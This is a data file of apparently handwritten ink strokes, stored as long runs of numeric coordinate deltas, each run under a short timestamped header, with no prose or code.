0,7 1 0,-4 0 0,-9 4 0,2-4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31:23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2672 24575,'23'0'0,"6"0"0,19 0 0,-6 0 0,6 0 0,5 0 0,-18 0 0,19 0 0,-18 0 0,-5 0 0,4 0 0,-6 0 0,2 0 0,8 0 0,-3 0 0,1 0 0,18 0 0,-21 0 0,22 0 0,-27-5 0,10 4 0,-11-14 0,6 7 0,16-19 0,-7 2 0,14-5 0,-17-3 0,-5 14 0,3-13 0,-8 13 0,3-3 0,-6 6 0,-6 1 0,1 3 0,-1-9 0,1 9 0,-6-4 0,15-4 0,-17 6 0,17-17 0,-13 17 0,-1-2 0,4 1 0,-5 3 0,6-5 0,-6-3 0,0 8 0,-5-4 0,-1 0 0,1 4 0,0 2 0,4-15 0,-3 16 0,3-16 0,1-1 0,-4 6 0,4-12 0,0 11 0,-9 4 0,7-4 0,-8 4 0,9-4 0,-3-1 0,9-5 0,-14 9 0,13-19 0,-13 23 0,4-18 0,4 5 0,-8-4 0,14-2 0,-9 0 0,3 4 0,-4 1 0,5-5 0,-4 10 0,3-4 0,-9 10 0,4 1 0,-9 1 0,9 3 0,-4-14 0,4 4 0,1-6 0,0 1 0,-5 6 0,3 4 0,-8 1 0,14-4 0,-8 2 0,3-4 0,0 7 0,-9 4 0,9 5 0,0-18 0,2 9 0,4-16 0,-6 9 0,1-5 0,0 4 0,-1-4 0,1 0 0,0 4 0,-1 0 0,1 3 0,0 3 0,4-5 0,-8 6 0,17-15 0,-16 17 0,17-16 0,-13 13 0,13-9 0,-12 8 0,12-8 0,-13 10 0,8-6 0,-3 0 0,0 5 0,3-8 0,-8 12 0,8-8 0,-3 6 0,4 3 0,0-9 0,1 9 0,5-8 0,1 7 0,6-8 0,5 8 0,-4-8 0,-2 9 0,-1-4 0,2 4 0,1-4 0,5 4 0,-6-9 0,0 8 0,5-9 0,12-1 0,-6 3 0,1-2 0,6 3 0,-6 6 0,28-11 0,-5 4 0,6 1 0,0 0 0,-24 10 0,0 0 0,25 1 0,12-9 0,-35 16 0,3-9 0,-12 3 0,1 1 0,-2-5 0,-12 10 0,14-4 0,-11 5 0,-1 0 0,7 0 0,-5 0 0,5 0 0,-6 0 0,-1-5 0,0 4 0,-4-4 0,-3 5 0,-14 0 0,-3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31:00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2583 24575,'11'0'0,"0"0"0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,4 0 0,-3 0 0,8 0 0,-8 0 0,8 0 0,-8 0 0,4 0 0,-6 0 0,1 0 0,0 0 0,4 0 0,-3 0 0,3 0 0,1 0 0,-4 0 0,13 0 0,-7 0 0,8 0 0,-10 0 0,0 0 0,-1 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,4 0 0,2 0 0,4 0 0,-4-4 0,3 2 0,-3-2 0,-1 4 0,0 0 0,-5 0 0,4 0 0,-3-5 0,3 4 0,1-4 0,1 0 0,-1 4 0,0-4 0,-1 5 0,-3 0 0,3 0 0,1-5 0,-4 4 0,3-4 0,1 5 0,-5 0 0,5 0 0,-5 0 0,-1 0 0,-4-5 0,4 4 0,-4-4 0,4 5 0,-4-5 0,9 4 0,-8-4 0,8 1 0,-4 2 0,0-2 0,-1-1 0,1 4 0,0-4 0,-1 5 0,1 0 0,-5-5 0,4 4 0,0-9 0,2 9 0,4-9 0,-1 4 0,-3-5 0,8-4 0,-3 3 0,-1-4 0,0 5 0,-1 1 0,-3-1 0,8 0 0,-13 0 0,12 0 0,-7-4 0,5 3 0,-2-4 0,1 5 0,-4 0 0,3 0 0,-4-4 0,4 3 0,-8-4 0,12 1 0,-11 3 0,7-9 0,-4 9 0,4-4 0,-3 6 0,4-1 0,-11-5 0,5 4 0,-4-4 0,5 6 0,-1-6 0,1 9 0,-5-8 0,3 9 0,-7-4 0,7-1 0,-3 0 0,10-5 0,-5-1 0,5 1 0,-5 0 0,-5 5 0,3 5 0,-8-4 0,9 4 0,-4-9 0,4 8 0,-4-8 0,-1 9 0,0-5 0,1-4 0,0 3 0,3-4 0,-3 0 0,0 4 0,4-8 0,-4 8 0,4-9 0,1 0 0,0 3 0,-1-3 0,-4 11 0,4-1 0,-4-10 0,4 3 0,6-8 0,-4 4 0,-2 5 0,0 2 0,-4-7 0,5-1 0,0 0 0,5-13 0,-4 17 0,4-19 0,4 0 0,-7 7 0,12-6 0,-8 16 0,5-7 0,-6 5 0,10-9 0,-13 9 0,7 2 0,-5 0 0,2 4 0,0 1 0,12-14 0,-10 10 0,13-1 0,-15 6 0,4 4 0,1-6 0,1-5 0,9 0 0,-9 5 0,4-4 0,-10 9 0,19-14 0,-20 13 0,25-9 0,-23 6 0,15-1 0,-10 0 0,9-5 0,-4 5 0,22-21 0,-23 17 0,30-21 0,-41 28 0,41-17 0,-30 18 0,22-13 0,-9 8 0,-5 0 0,10-4 0,2 4 0,1-5 0,11-2 0,-11 2 0,15 4 0,-14 2 0,2 6 0,-6 4 0,-4-3 0,0 3 0,4-4 0,-4 0 0,5-1 0,1 0 0,9-5 0,-17 9 0,15-7 0,-28 13 0,7-3 0,-5 0 0,3 4 0,9-9 0,3 9 0,13-10 0,4 5 0,-1-6 0,-2 0 0,-11 6 0,0-4 0,11 3 0,-8 0 0,8-3 0,-5 3 0,-14 1 0,2 0 0,21-5 0,-19 3 0,32-9 0,-21 5 0,-11 6 0,9-5 0,-21 10 0,12-4 0,-22 0 0,6 4 0,-11-4 0,2 5 0,14 0 0,-12 0 0,1 0 0,-15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31:03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24575,'0'27'0,"0"-7"0,0 20 0,0 25 0,0-12 0,0 7 0,0 1 0,0-4 0,0-7 0,0 0 0,0 8 0,0 0 0,0 3 0,0-4 0,0 23 0,0 7 0,0 12 0,0-24 0,0-12 0,0 6 0,0-18 0,0 12 0,0 30 0,0-20 0,0-8 0,0 2 0,0-13 0,0-2 0,0 45 0,0-7 0,0-17 0,0-10 0,0-10 0,0-20 0,0 10 0,0 0 0,0 8 0,0-18 0,0-12 0,0 4 0,0-11 0,0 11 0,0-9 0,0-4 0,0 3 0,0-4 0,0 4 0,0-3 0,0 8 0,0-8 0,0 9 0,0-10 0,0 10 0,0-5 0,-10 16 0,7-9 0,-7 4 0,10-12 0,0-4 0,-5 0 0,4 4 0,-4-3 0,5 4 0,0-1 0,0-3 0,0 3 0,0-9 0,0-1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5T14:41:08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24575,'0'23'0,"0"31"0,0-23 0,0 36 0,0-27 0,0 38 0,0-26 0,0 41 0,0-45 0,0 13 0,0-32 0,0-3 0,0-14 0,0 9 0,0-13 0,0 1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31:05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8 817 24575,'35'0'0,"6"0"0,-15 11 0,5 2 0,-6 11 0,-4-2 0,-14-4 0,3-12 0,-10-13 0,0-28 0,0 1 0,0-7 0,0-20 0,-6 24 0,-1-32 0,-18 6 0,9 12 0,-20-35 0,14 18 0,-9-16 0,6 14 0,6 16 0,7 20 0,7 11 0,5 8 0,14 9 0,0 1 0,18 0 0,-7 4 0,2-4 0,-3 5 0,16 0 0,-3-5 0,11 3 0,-3-3 0,-10 5 0,4-5 0,-5 4 0,-6-9 0,5 8 0,-5-8 0,11 4 0,-10 0 0,-6 1 0,-14 5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31:11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24575,'38'0'0,"18"0"0,7 0 0,-13 0 0,3 0 0,31 0 0,6 0 0,0 0 0,-3 0-1493,-13 0 0,-1 0 1493,5 0 0,1 0 471,-2 0 1,2 0-472,14 0 0,-1 0 0,-14 1 0,1-2 0,21-4 0,-2-2 245,-36 6 1,-3-1-246,11-7 0,1-1 0,-2 3 0,-3 0 0,33-3 0,-5-2 0,2 6 0,0 5 776,-34-2 0,1 0-776,-13 3 0,0 0 0,21 0 0,-2 0 0,8 0 0,-23 0 0,2 0 0,38 0 0,-28 0 0,-6 0 0,6 0 0,-4 0 0,-1 0 0,1 0 0,2 0 0,15 0 0,0 0 0,-19 0 0,-2 0 0,0 3 0,-1 0 0,-2-2 0,-2 0 0,1 4 0,0 2 0,3-4 0,2 1 0,-2 2 0,3 2 0,23 4 0,0 1 0,-27-5 0,0 1 0,20 6 0,-1 1 0,-23-5 0,-4 0 0,38 10 0,0-8 0,-20-3 0,2-1 0,22 0 0,-9 0 0,0 1 0,12 3 0,-34-3 0,-2-1 0,14-1 0,-19 1 0,-1-1 0,16-7 0,25 5 0,-25-6 0,22 0 0,-24 0 0,8 0 0,-3-5 0,-22 3 0,11-8 0,-11 8 0,5-9 0,-7 5 0,7-12 0,-5 0 0,34-12 0,-8 4 0,20-5 0,-28 11 0,-12 1 0,-12 7 0,-5 0 0,2 0 0,-11 6 0,4-4 0,-14 8 0,2-2 0,-9 4 0,0-5 0,-1 4 0,1-4 0,0 5 0,-1 0 0,1 0 0,4 0 0,-3 0 0,4 0 0,-6 0 0,-4 5 0,4 5 0,-4 7 0,0 4 0,3-9 0,-7 2 0,7-8 0,-8 5 0,4-5 0,-5-1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31:13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1 175 24575,'16'0'0,"0"0"0,-5 0 0,-1 0 0,6 0 0,1 0 0,0 0 0,-1 0 0,-5 0 0,0 0 0,5 0 0,1 0 0,5 0 0,-1 0 0,6 0 0,-4 0 0,4 0 0,-6 0 0,6 0 0,-10 0 0,13-10 0,-12 7 0,9-12 0,-6 9 0,1-5 0,-1 0 0,1-4 0,-1 3 0,0-4 0,6 5 0,-9 0 0,3 5 0,-10-3 0,0 8 0,4-9 0,-3 9 0,3-4 0,-4 5 0,5-5 0,0 4 0,6-4 0,-1 5 0,0 0 0,1 0 0,-1 0 0,-4 0 0,-2 0 0,-4 0 0,-5-5 0,8 4 0,-7-4 0,13 5 0,-8 0 0,4 0 0,-5 0 0,-6 0 0,0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31:26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24575,'0'16'0,"0"8"0,0 1 0,0 21 0,0-5 0,0 9 0,0 12 0,0-3 0,0 24 0,0-12 0,0 0 0,8 3 0,1 0 0,-4-5 0,5 2 0,2-6 0,-5-27 0,6 26 0,-1-19 0,-5 19 0,9-16 0,-7 3 0,8 10 0,-4-1 0,-1 8 0,0-6 0,-5 12 0,-2-12 0,-5 22 0,5-2 0,-3-17 0,3-2 0,-5-38 0,5 21 0,-3-2 0,3 10 0,-5-6 0,0-9 0,0 16 0,0-27 0,0 14 0,0-16 0,0-12 0,0 22 0,0-13 0,0 5 0,0-2 0,0-4 0,0-1 0,0 0 0,0-4 0,0 3 0,0-8 0,0 8 0,0-8 0,0 4 0,0-6 0,-4 6 0,2-4 0,-2 3 0,4 1 0,0-4 0,-5 3 0,4-4 0,-4 4 0,5-3 0,0 3 0,0-4 0,0 0 0,0 0 0,0-6 0,0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30:16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24575,'29'0'0,"-4"0"0,28 0 0,-3 0 0,19 0 0,-14 0 0,8 0 0,-21 0 0,35 0 0,-17 0 0,23 0 0,-7 0 0,10 0 0,-14 0 0,5 0 0,-23 0 0,-11 0 0,-3 0 0,-11-5 0,19-2 0,5-10 0,-2 9 0,11-7 0,-18 8 0,20-5 0,-12 1 0,-5 5 0,-11 1 0,-24 5 0,-2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30:18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24575,'18'0'0,"8"0"0,-12 0 0,7 0 0,-5 0 0,-4 0 0,10 0 0,-10 0 0,14 0 0,-2 0 0,5 0 0,51 0 0,-38 0 0,45 0 0,-30 0 0,-7 0 0,-5 0 0,-14 0 0,-15 0 0,6 0 0,-6 0 0,5 0 0,-10 0 0,14-5 0,-12 4 0,8-9 0,-6 4 0,2-4 0,4-6 0,6 4 0,7-4 0,1 5 0,5-6 0,-6 5 0,-11 1 0,3 5 0,-19 6 0,3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31:29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346 233 24575,'-11'0'0,"0"0"0,-4 0 0,3 0 0,-14 0 0,7 0 0,-4 0 0,1 0 0,4 0 0,10 0 0,9 0 0,23 0 0,15-6 0,8-2 0,14-6 0,27 0 0,-15-2 0,5-2 0,-5 5 0,1 0 0,4-5 0,-4 1 0,-18 9 0,-7 1 0,15-5 0,-2 4 0,8-5 0,-15 0 0,27 1 0,-43 6 0,8 1 0,-25 0 0,-6 4 0,0-4 0,-6 5 0,-8 0 0,-9 0 0,-83 0 0,35 6 0,1-3 0,-4 1 0,-1 6 0,5 1 0,-7 4 0,2-5 0,-1 1 0,-21 9 0,3-5 0,26-2 0,-1 0 0,-30 2 0,-1 4 0,14-12 0,21 4 0,15-10 0,-20 4 0,12-5 0,-19 0 0,26 0 0,3 0 0,9 0 0,0 0 0,8 0 0,-1 0 0,4 0 0,-4 0 0,10 5 0,1 1 0,5 0 0,0-1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33:48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1 152 24575,'5'-11'0,"1"-5"0,27 3 0,-16-9 0,28 14 0,-1-13 0,-9 13 0,19-9 0,-23 10 0,11-9 0,-4 14 0,-3-9 0,12 11 0,-10 0 0,16 0 0,-12 0 0,-7 0 0,-2 5 0,-15 1 0,8 9 0,-13 2 0,-1 4 0,-6 6 0,-5-3 0,0 4 0,0 36 0,0-14 0,-17 36 0,-8-25 0,-19-1 0,7-15 0,3-6 0,0-5 0,-12 6 0,8-3 0,-9 0 0,29-21 0,-3 0 0,11-6 0,4 1 0,1 0 0,14-5 0,4-2 0,16-4 0,19 0 0,1 0 0,14 0 0,8 0 0,11 0 0,11 0 0,-8-5 0,-16 3 0,-17-8 0,-16 8 0,-9-3 0,-12 5 0,10-5 0,-10 4 0,10-9 0,-15 9 0,1-4 0,-5 5 0,-1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33:51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24575,'15'0'0,"-3"0"0,4 0 0,-6 0 0,7 0 0,-5 0 0,4 0 0,-5 0 0,-1 0 0,1 0 0,-5 5 0,3-4 0,-7 9 0,7-9 0,-8 9 0,9-4 0,-9 4 0,4 1 0,-5 0 0,0 4 0,0-3 0,0 3 0,0-4 0,0 0 0,-5-5 0,-1 8 0,-5-12 0,0 13 0,-4-5 0,3-3 0,1 8 0,-4-14 0,13 8 0,-12-7 0,12 7 0,-2-3 0,-1 0 0,3 3 0,-7-3 0,8 5 0,-9 0 0,9-1 0,-4 1 0,10-5 0,1-1 0,10-5 0,11 0 0,-1 0 0,1 0 0,-6 0 0,-5 0 0,1 0 0,-1 0 0,-1 0 0,-3 0 0,3 0 0,-4 0 0,0-5 0,4 4 0,-3-9 0,4 9 0,-11-9 0,5 9 0,-9-4 0,4 5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33:54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89 24575,'0'11'0,"0"-1"0,0 1 0,0 9 0,0-7 0,0 8 0,0-11 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,5 0 0,1-1 0,4 1 0,1-5 0,0-1 0,0-5 0,-1 0 0,1 0 0,4 0 0,-3 0 0,4 0 0,-6 0 0,1 0 0,5 0 0,5 0 0,-3 0 0,2 0 0,-9 0 0,-1 0 0,1 0 0,-5-5 0,-1-1 0,-5-5 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-5-1 0,-1 0 0,0 0 0,-4 5 0,9-4 0,-9 4 0,0-4 0,-2-1 0,-4 5 0,5-9 0,0 8 0,-4-9 0,3 6 0,-9-1 0,4 0 0,1 5 0,0 1 0,5 5 0,0 0 0,-4 0 0,3 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,5 5 0,2 1 0,4 5 0,0-1 0,0 1 0,0 0 0,0-5 0,0-2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5T14:41:09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1 214 24575,'36'0'0,"-4"0"0,13-11 0,16-9 0,-10-7 0,6 1 0,10-5 0,-30 22 0,57-20 0,-55 26 0,27-8 0,-47 11 0,7 0 0,-14 0 0,3-11 0,6 9 0,-3-19 0,10 19 0,-11-9 0,-7 11 0,-5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34:04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0 761 24575,'18'0'0,"9"0"0,-14 0 0,13 0 0,-8 10 0,4-8 0,-5 13 0,-2-13 0,-4 7 0,5-8 0,-5 4 0,5-5 0,-5 0 0,-1 0 0,1 0 0,0 5 0,-1-4 0,1 9 0,-5-4 0,4-1 0,-5 5 0,1-4 0,9 5 0,-3-1 0,4 1 0,9 0 0,-12-5 0,3 3 0,-7-8 0,-3 4 0,5-5 0,0 0 0,-1 0 0,-4-5 0,-1-6 0,0-2 0,-4-8 0,4 3 0,-5-6 0,5-16 0,1 13 0,6-30 0,5-2 0,-4 1 0,9-9 0,-10 37 0,4-6 0,-5 12 0,0-10 0,1 4 0,0-3 0,-1 10 0,0-5 0,0 7 0,-6-1 0,5 0 0,-4 6 0,5-5 0,4-11 0,-7 11 0,6-9 0,-7 4 0,4 11 0,0-16 0,-5 24 0,-2-3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34:06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24575,'3'0'0,"5"0"0,15 0 0,6-12 0,-9 10 0,14-15 0,-15 5 0,11 4 0,0-3 0,26 6 0,-8 3 0,10-3 0,-26 5 0,-14 0 0,-3 0 0,6 0 0,-3 0 0,4 0 0,3 9 0,-11-1 0,6 7 0,-10-4 0,-4 9 0,-1-2 0,-5 8 0,0-5 0,0 6 0,0 1 0,0 18 0,0 3 0,-11 18 0,-3 2 0,-17 7 0,-6 9 0,3-24 0,4-3 0,2-18 0,9-4 0,-15 11 0,4-6 0,0-1 0,7-11 0,2 3 0,9-9 0,-4-6 0,37-18 0,-2-8 0,29-8 0,14-4 0,2-1 0,-4-3 0,1 6 0,-3 0 0,-11-3 0,-20 19 0,13-13 0,-12 9 0,-4 1 0,7 1 0,-3 5 0,-6 0 0,3-5 0,-13 4 0,-1-4 0,-7 5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34:09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24575,'16'0'0,"-4"0"0,3 0 0,-4 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,6 0 0,-4 5 0,8 1 0,-8 5 0,3-5 0,1 8 0,-9-7 0,7 4 0,-13-2 0,4-3 0,-5 10 0,0-4 0,0 8 0,0-8 0,0 3 0,0 5 0,0-7 0,-5 12 0,-1-13 0,-10 4 0,4-6 0,-3-4 0,13-1 0,8-5 0,12 0 0,4 0 0,1 0 0,4 0 0,-9 0 0,3 0 0,-10 0 0,4 0 0,-3 0 0,4 0 0,-10 5 0,-1 1 0,-5 9 0,0-3 0,-5 4 0,-1-11 0,0 5 0,-9-4 0,8 5 0,-9-1 0,6-4 0,-1 4 0,0-9 0,0 8 0,0-7 0,-10 7 0,3-3 0,-9 10 0,5 0 0,5 1 0,2-2 0,4-4 0,0-5 0,0-1 0,5-1 0,-4-2 0,9 7 0,-4-3 0,5 5 0,0-5 0,0-2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34:11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70 24575,'0'11'0,"0"-1"0,0 1 0,0 0 0,0-1 0,0 1 0,0 4 0,0-3 0,0 9 0,0-5 0,5 1 0,-4-2 0,4-4 0,-1 0 0,2-1 0,5-4 0,5 4 0,-5-9 0,10 9 0,-9-9 0,3 3 0,-4-4 0,9 0 0,-7 0 0,7 0 0,-9 0 0,0 0 0,-1 0 0,-4-4 0,-1-2 0,0-20 0,-4 11 0,5-11 0,-6 15 0,0 0 0,0 1 0,0-11 0,0 3 0,0-4 0,0 7 0,0 4 0,0 0 0,0 0 0,-5 5 0,-1-3 0,-5 3 0,0-5 0,-5 0 0,4 0 0,-3 5 0,4-3 0,0 7 0,0-2 0,0 4 0,1 0 0,-1 0 0,0 0 0,-5 0 0,4 0 0,-3 0 0,4 0 0,0 0 0,0 4 0,0-3 0,5 9 0,2-4 0,-1 0 0,4 3 0,-4-3 0,5 0 0,0-1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34:14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1 308 24575,'4'-11'0,"7"-4"0,1 3 0,4-16 0,5 14 0,-2-8 0,3 16 0,-6-4 0,0 9 0,7-4 0,-5 5 0,8 0 0,-4 0 0,7 5 0,5 11 0,6 3 0,-10 14 0,3-3 0,-6-2 0,1 4 0,-4-14 0,-4 7 0,-9-18 0,4 12 0,-3-11 0,3 2 0,1-5 0,-4-5 0,8 0 0,-3 0 0,-1-5 0,10-16 0,-13-4 0,13-20 0,-13 4 0,9 0 0,-4-4 0,-1 9 0,9-7 0,-7 8 0,2 8 0,-6 11 0,10-8 0,-10 19 0,5-19 0,-15 23 0,-5-4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34:17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0 185 24575,'10'-21'0,"-2"2"0,13-4 0,8-4 0,-4 12 0,9-7 0,-1 5 0,4 5 0,10-5 0,-11 11 0,9 0 0,-15 6 0,0 0 0,0 0 0,-17 0 0,12 0 0,-8 5 0,4 6 0,-4 6 0,3 4 0,-8 0 0,-1 1 0,-2 5 0,-8 11 0,4-6 0,-3 18 0,-4 5 0,-10 15 0,-3 6 0,-3 0 0,-7-2 0,-1-19 0,-2-1 0,-1 14 0,-15 10 0,12-14 0,2-23 0,11-11 0,-2-2 0,-7 16 0,8-12 0,-6 20 0,25-38 0,14 5 0,13-25 0,5 0 0,22-12 0,6-2 0,12-5 0,9-6 0,-24 11 0,4-9 0,-25 21 0,-3-7 0,-15 14 0,-2-4 0,-4 0 0,0 4 0,0-8 0,-1 7 0,-4-2 0,-1 4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34:19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24575,'0'20'0,"0"-7"0,0 8 0,0-5 0,0-4 0,0 15 0,0-9 0,0 5 0,0-1 0,0-10 0,0 4 0,0-5 0,0-1 0,0 1 0,0 0 0,0-1 0,4-4 0,2-1 0,5-10 0,0 4 0,-1-4 0,1 5 0,5-5 0,0-1 0,1 0 0,3-3 0,-8 8 0,3-4 0,1 5 0,0 0 0,1 0 0,-1 0 0,-6 0 0,1 0 0,0 0 0,-5 0 0,-2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34:20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24575,'0'15'0,"0"-3"0,0 3 0,0 12 0,0-7 0,0 8 0,0 11 0,0-23 0,0 23 0,0-22 0,0 11 0,0-4 0,0 3 0,0 0 0,0-5 0,0 5 0,0-10 0,0-2 0,0-4 0,0 0 0,5-5 0,-4 3 0,4-3 0,-5 0 0,0-1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34:22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24575,'0'17'0,"0"-5"0,0 4 0,0-5 0,0-1 0,0 1 0,0 0 0,0-1 0,0 7 0,0-5 0,0 10 0,0-10 0,0 9 0,0-9 0,0 3 0,0-4 0,0-1 0,4-4 0,7 4 0,-4-4 0,7 0 0,-3-2 0,1-4 0,3 0 0,1 0 0,0 0 0,6 0 0,-1 0 0,-4 0 0,-2 0 0,1 0 0,-4-4 0,3-13 0,-4-11 0,-5 3 0,-1-7 0,0 10 0,-4-17 0,4 8 0,-5-1 0,0 16 0,0 5 0,-5 5 0,-15-13 0,-5 10 0,-3-6 0,7 5 0,0 4 0,3 0 0,-5-3 0,8 7 0,4-2 0,0 4 0,0 0 0,0 0 0,0 0 0,5 0 0,2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34:38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1 189 24575,'0'24'0,"0"-3"0,0-11 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,4-4 0,-2 4 0,7-9 0,-3 8 0,5-3 0,-5 5 0,3-5 0,-8-6 0,4-11 0,-5-1 0,0-3 0,0 4 0,0 0 0,0 0 0,0 0 0,0-4 0,5-2 0,1-5 0,4-5 0,1 9 0,0-13 0,-5 18 0,4-18 0,-4 13 0,0-5 0,4 8 0,0-1 0,2 4 0,8-4 0,-3 5 0,4 1 0,1-1 0,-6 5 0,0 1 0,-5 5 0,-1 0 0,1 0 0,0 5 0,-1 1 0,1 9 0,5 16 0,-9-11 0,2 15 0,-4-23 0,-4 8 0,4-8 0,0 13 0,-4-12 0,8 12 0,-8-13 0,4 3 0,0 0 0,1 2 0,0 0 0,-1-2 0,-1-9 0,-2 4 0,2-4 0,-4-1 0,0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5T14:41:11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14 24575,'-15'0'0,"-3"0"0,1 0 0,-5 0 0,-22 0 0,14 0 0,-14 0 0,22 0 0,5 10 0,-1 8 0,1 23 0,11 2 0,0 23 0,6-9 0,0 4 0,0-24 0,0-5 0,0-15 0,10 5 0,-3-10 0,8-3 0,-4-9 0,5 0 0,1-15 0,5-9 0,1-30 0,2-9 0,-1-6 0,-10 18 0,2-11 0,-15 29 0,3-8 0,-4 20 0,5 15 0,1 6 0,11 28 0,-5-6 0,6 18 0,-7-17 0,15 20 0,-11-20 0,11 13 0,-11-21 0,2 2 0,4-5 0,-4-3 0,-1-4 0,24-4 0,-16 4 0,24-5 0,-30-5 0,-2-6 0,1-7 0,6-22 0,7-15 0,-5 14 0,-3-8 0,-6 32 0,-4 4 0,3-1 0,-4 12 0,-5-2 0,-1 4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34:41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24575,'0'11'0,"0"0"0,0-1 0,0 1 0,0 0 0,0-1 0,0 6 0,0-4 0,0 3 0,0 1 0,5-4 0,1-2 0,0 0 0,8 0 0,-7 2 0,14 9 0,-10-10 0,5 5 0,-1-5 0,-3-1 0,8 1 0,-8-5 0,4-1 0,-6-5 0,1 0 0,0 0 0,0 0 0,-1 0 0,10 0 0,-6 0 0,6 0 0,-10-5 0,-4-1 0,-1-5 0,0-15 0,-3 7 0,3-9 0,-5 13 0,0 4 0,0 0 0,0 0 0,-10 0 0,8 1 0,-13 4 0,9-4 0,-5 9 0,1-4 0,-1 5 0,0 0 0,0 0 0,0 0 0,0 0 0,1-5 0,-6 4 0,-1-9 0,0 9 0,2-8 0,4 3 0,0 0 0,0 1 0,5 0 0,-3 4 0,3-4 0,-5 5 0,5 0 0,1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34:44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34:45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34:45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36:35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 24575,'16'0'0,"2"0"0,18 0 0,-3 0 0,36 0 0,-25 0 0,18 0 0,14 0 0,-4 0 0,26 0 0,-20 0 0,4 0 0,-4 0 0,-2 0 0,-1 0 0,-4 0 0,-13 0 0,-9 0 0,-9 0 0,-19 0 0,24 0 0,-2 0 0,26 0 0,-8 0 0,37-6 0,-36-1 0,30-6 0,-23 1 0,-13 0 0,-16 0 0,-18 5 0,-2 3 0,-13-1 0,8 4 0,-9-4 0,4 0 0,6-1 0,0-5 0,6 0 0,-1 1 0,1-1 0,-1 0 0,-4 5 0,-7 1 0,-5 5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37:02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24575,'23'0'0,"0"0"0,41 0 0,10 0 0,-18 0 0,2 0 0,37 0 0,-12 0 0,16 0 0,-33 0 0,11 0 0,-37 0 0,-12 0 0,12 0 0,-9 0 0,12 0 0,-20 0 0,3 0 0,-4 0 0,-6 0 0,-5 0 0,-6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37:27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24575,'16'0'0,"12"0"0,-2 0 0,2 0 0,29 0 0,-31 0 0,33 0 0,-12 0 0,-12 0 0,20 0 0,7 0 0,-1 0 0,15 0 0,3 0 0,5 0 0,-17 0 0,-6 0 0,-16 0 0,0 0 0,11 0 0,10 5 0,9 2 0,0 6 0,0-1 0,-9 1 0,-10-6 0,20-1 0,9 0 0,-11-5 0,3 0 0,-22 2 0,0 0 0,42 1 0,0-1 0,-40-3 0,-2 1 0,13 2 0,-3 1 0,21-4 0,-15 0 0,-21 0 0,2 0 0,39 0 0,-39 0 0,-1 0 0,22 0 0,-17 0 0,3 0 0,-24 0 0,-8 0 0,-17 4 0,-5-3 0,-5 4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38:28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24575,'17'0'0,"-5"0"0,49 0 0,-19 0 0,30 0 0,-3 0 0,-25 0 0,17 0 0,1 0 0,6 0 0,6 0 0,-10 0 0,15 0 0,-2 0 0,-26 0 0,2 0 0,2 0 0,-2 0 0,27 0 0,4 0 0,-23 0 0,-6 0 0,-3 0 0,-5 0 0,-1 0 0,1 0 0,-1 0 0,7 0 0,-5 0 0,5 0 0,-7 0 0,-5 0 0,4 0 0,-20 0 0,12 0 0,-24 0 0,13 0 0,-13 0 0,12 0 0,7 0 0,-2 0 0,1 0 0,-16 0 0,-9 0 0,-1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38:57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24575,'23'0'0,"2"0"0,37 0 0,-18 0 0,32 0 0,-3 0 0,19 0 0,-16 0 0,0 0 0,-12 0 0,-6 0 0,-1 0 0,3 0 0,-25 0 0,19 0 0,-16 0 0,4 0 0,-4 0 0,8 0 0,1 0 0,4 0 0,-10 0 0,-14 0 0,-17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39:10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24575,'31'0'0,"9"0"0,-21 0 0,34 0 0,-18 0 0,20 0 0,6 0 0,7 0 0,30-6 0,-4 5 0,-3-11 0,-15 11 0,-9-10 0,-6 10 0,10-10 0,-7 4 0,1 0 0,-13 2 0,-11 5 0,-1-5 0,-1 4 0,-4-5 0,5 6 0,-6 0 0,0 0 0,-11 0 0,3 0 0,-14 0 0,8 0 0,-8 0 0,3 0 0,-9 0 0,-1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5T14:41:12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0 24575,'-17'0'0,"1"0"0,-10 0 0,5 0 0,-12 0 0,16 0 0,-4 0 0,13 20 0,-2-10 0,10 41 0,0-29 0,0 15 0,0-22 0,0 1 0,0-4 0,5 3 0,1-4 0,15 0 0,2 5 0,27 17 0,-17-6 0,11 12 0,-11-11 0,-2-4 0,-2-1 0,1-3 0,-12-12 0,14 1 0,1-19 0,3-8 0,7-26 0,-18 20 0,1-11 0,-20 29 0,-1 0 0,-5 1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39:16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24575,'11'0'0,"0"0"0,4 0 0,-3 0 0,3 0 0,13 0 0,-13 0 0,18 0 0,-11 0 0,-3 0 0,7 0 0,-8 0 0,0 0 0,8 0 0,8 0 0,-2 0 0,6 0 0,11 0 0,-9 0 0,15 0 0,-10 0 0,-9 0 0,3 0 0,0 0 0,-14 0 0,15 0 0,-11 0 0,5 0 0,-8 0 0,-5 0 0,-5 0 0,1 0 0,3 0 0,-3 0 0,9 0 0,-4 0 0,0 0 0,-2 5 0,-8-4 0,8 4 0,-8-5 0,8 0 0,-8 0 0,8 0 0,-3 0 0,-1 0 0,0 0 0,-5 0 0,-5 4 0,-2-2 0,-4 2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35:49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44 115 24575,'16'-11'0,"-4"4"0,10-5 0,0-3 0,2 13 0,-1-13 0,3 14 0,-7-14 0,9 12 0,-5-12 0,5 13 0,-3-8 0,12 9 0,-11-5 0,1 6 0,-6 0 0,1 0 0,1 0 0,4 0 0,-11 0 0,0 0 0,-6 0 0,1 0 0,-5 10 0,-1-3 0,-5 8 0,0 10 0,0-10 0,-5 10 0,-6-10 0,-6 2 0,-15 9 0,13-8 0,-32 28 0,23-24 0,-11 20 0,18-24 0,5 3 0,4-10 0,-4 10 0,0-4 0,4 5 0,-9 0 0,4 5 0,-10-4 0,3 4 0,-3 0 0,9-3 0,-3-1 0,-2 8 0,-1-6 0,-3 8 0,10-6 0,1-10 0,15-6 0,2-7 0,29-4 0,-8 0 0,15 0 0,-9 0 0,-4 0 0,15 0 0,-19 0 0,17 0 0,-14 0 0,11 0 0,5 0 0,2 0 0,-1-4 0,-1 2 0,0-8 0,2 9 0,6-9 0,-6 8 0,-2-8 0,-11 9 0,4-5 0,-14 6 0,-3 0 0,-10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35:52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24575,'0'11'0,"0"0"0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 6 